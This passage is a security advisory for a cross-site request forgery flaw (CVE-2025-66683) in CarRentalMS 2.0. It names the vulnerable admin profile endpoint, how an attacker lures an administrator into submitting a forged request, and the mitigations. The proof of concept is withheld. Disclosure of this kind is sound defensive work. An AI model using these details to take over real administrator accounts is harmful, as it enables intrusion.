For example, a malicious website could embed a hidden request that, when visited by an authenticated CarRentalMS 2.0 user, would force them to execute actions like deleting a car, modifying rental details, or changing their password without their consent.
The flaw typically arises from the application's failure to verify if a request originated from the legitimate user interface. The impact includes unauthorized data manipulation and potential system compromise. Mitigation usually involves implementing anti-CSRF tokens for all state-changing requests.
## Description
A Cross-Site Request Forgery (CSRF) vulnerability exists in the administrator profile update functionality of **CarRentalMS v2.0**. The affected endpoint does not implement anti-CSRF protections, allowing an attacker to perform unauthorized profile modifications on behalf of an authenticated administrator via crafted HTML content.
This issue has been assigned **CVE-2025-66683**.
## Affected Product
- Project: CarRentalMS
- Version: 2.0
- Vendor: Mart Mbithi
## Affected Component
- Endpoint: `/CarRentalMS/ui/backoffice_settings`
- Functionality: Admin profile update
## Vulnerability Type
- Cross-Site Request Forgery (CSRF)
- CWE-352
## Attack Vector
Remote. An attacker can lure an authenticated administrator into visiting a malicious webpage (e.g., via a malicious advertisement or compromised website), which silently submits a forged POST request to the vulnerable endpoint.
## Impact
Successful exploitation allows unauthorized modification of administrator profile details, including email address changes. This can result in:
- Full account takeover
- Privilege escalation
- Persistence establishment
- Potential data exfiltration
## Conditions for Exploitation
- Administrator is authenticated
- No anti-CSRF tokens are implemented
- No SameSite cookie protections are enforced
- User interaction with attacker-controlled HTML content
## Proof of Concept
A working proof of concept demonstrates exploitation by auto-submitting a crafted HTML form while an administrator session is active, resulting in profile data being modified without user consent.
(PoC details provided to maintainers; not fully reproduced here.)
## Mitigation Recommendations
- Implement anti-CSRF tokens (e.g., synchronizer token pattern)
- Enforce `SameSite` cookie attributes
- Validate request origin and referer headers
- Apply additional server-side authorization checks for state-changing requests
## References
- [https://cwe.mitre.org/data/definitions/352.html](https://cwe.mitre.org/data/definitions/352.html)
- [https://owasp.org/www-community/attacks/csrf](https://owasp.org/www-community/attacks/csrf)
- [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)
- [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite)
## Discoverer
Parthiv Kumar Nikku ([